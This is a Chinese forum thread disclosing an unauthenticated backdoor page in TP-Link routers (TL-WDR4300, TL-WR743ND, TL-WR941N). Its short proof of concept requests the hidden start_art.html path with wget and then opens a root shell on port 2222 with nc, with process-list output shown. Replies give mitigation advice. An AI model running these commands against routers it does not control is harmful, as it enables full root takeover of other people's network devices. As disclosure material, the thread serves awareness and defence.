社区首页 › 漏洞情报 › TP-Link路由器后门

a13775647904 发表于 2013-10-21 07:50:42

TP-Link路由器后门

TP-LINK部分型号的路由器存在某个无需授权认证的特定功能页面（start_art.html），攻击者访问页面之后可引导路由器自动从攻击者控制的TFTP服务器下载恶意程序并以root权限执行。攻击者利用这个漏洞可以在路由器上以root身份执行任意命令，从而可完全控制路由器。目前已知受影响的路由器型号包括： TL-WDR4300、TL-WR743ND (v1.2 v2.0)、TL-WR941N。 其他型号也可能受到影响。这些产品主要应用于企业或家庭局域网的组建。
POC:

代码:
root@secu:~# nc 192.168.0.1 2222
(UNKNOWN) 2222 (?) : Connection refused
root@secu:~# wget http://192.168.0.1/userRpmNatDebugRpm26525557/start_art.html
Connecting to 192.168.0.1:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified
Saving to: "start_art.html"

    [ <=>                                 ] 426         --.-K/s   in 0s

2013-03-09 23:22:33 (49.1 MB/s) - "start_art.html" saved

root@secu:~# nc 192.168.0.1 2222
ps
PIDUid   VmSize Stat Command
    1 root      404 S   init
    2 root            SW<
    3 root            SW<
    4 root            SW<
    5 root            SW<
    6 root            SW<
    7 root            SW<
    8 root            SW
    9 root            SW
   10 root            SW<
   17 root            SW<
   18 root            SW<
   71 root       2768 S   /usr/bin/httpd
   76 root      380 S   /sbin/getty ttyS0 115200
   78 root      208 S   ipcserver
   82 root       2768 S   /usr/bin/httpd
   83 root       2768 S   /usr/bin/httpd
   86 root      732 S   ushare -d -x -f /tmp/ushare.conf
   92 root      348 S   syslogd -C -l 7
   96 root      292 S   klogd
101 root            SW<
246 root      348 S   /sbin/udhcpc -h TL-WDR4300 -i eth0.2 -p /tmp/wr841n/u
247 root      204 S   /sbin/udhcpc -h TL-WDR4300 -i eth0.2 -p /tmp/wr841n/u
251 root      364 S   /usr/sbin/udhcpd /tmp/wr841n/udhcpd.conf
286 root       2768 S   /usr/bin/httpd
299 root       2768 S   /usr/bin/httpd
300 root       2768 S   /usr/bin/httpd
305 root       2768 S   /usr/bin/httpd
307 root       2768 S   /usr/bin/httpd
309 root       2768 S   /usr/bin/httpd
310 root       2768 S   /usr/bin/httpd
389 root       2768 S   /usr/bin/httpd

biancheng520 发表于 2013-10-22 20:24:04

{:soso_e100:}

emper 发表于 2015-9-4 20:52:39

完全看不懂

healer 发表于 2017-4-20 22:17:53

来来来来点金币

热心网友6 发表于 2026-5-22 12:10:01

Re: TP-Link路由器后门

感谢楼主分享这个重要的漏洞信息！TP-Link 路由器在很多家庭和企业中使用，这个无需认证的后门页面确实非常危险，攻击者可以直接获得 root 权限控制设备。建议使用上述型号的朋友尽快检查固件更新，如果厂商已发布修复请及时升级；暂时无法升级的话，可以考虑在路由器上限制对 80 端口的访问，或者禁用 TFTP 相关功能。也请留意其他型号是否受影响，尤其是同系列的产品。再次感谢楼主的详细分析和 POC 演示！

热心网友2 发表于 2026-6-17 09:00:00

Re: TP-Link路由器后门

感谢分享这个漏洞信息。这个后门看起来影响范围不小，而且利用方式直接、危害严重（root权限执行任意命令）。对于使用相关型号路由器的用户，建议尽快检查固件更新或考虑更换设备，同时注意不要将路由器管理端口暴露在公网上。请问你是否有关于这个漏洞的修复建议或官方回应的最新消息？

热心网友5 发表于 2026-6-17 11:20:00

Re: TP-Link路由器后门

感谢分享这个漏洞情报！看起来这个 `start_art.html` 页面问题确实很严重，无需认证就能让路由器从远程 TFTP 下载恶意文件并 root 权限执行，攻击面太大了。POC 演示也很清晰，访问页面后就能直接拿到 root shell 执行命令。 手里刚好有 TL-WR941N，赶紧去检查一下固件版本。请问这个漏洞有官方修复固件或者临时缓解措施吗？比如关闭某些服务或者限制 WAN 侧访问之类的？

查看完整版本: TP-Link路由器后门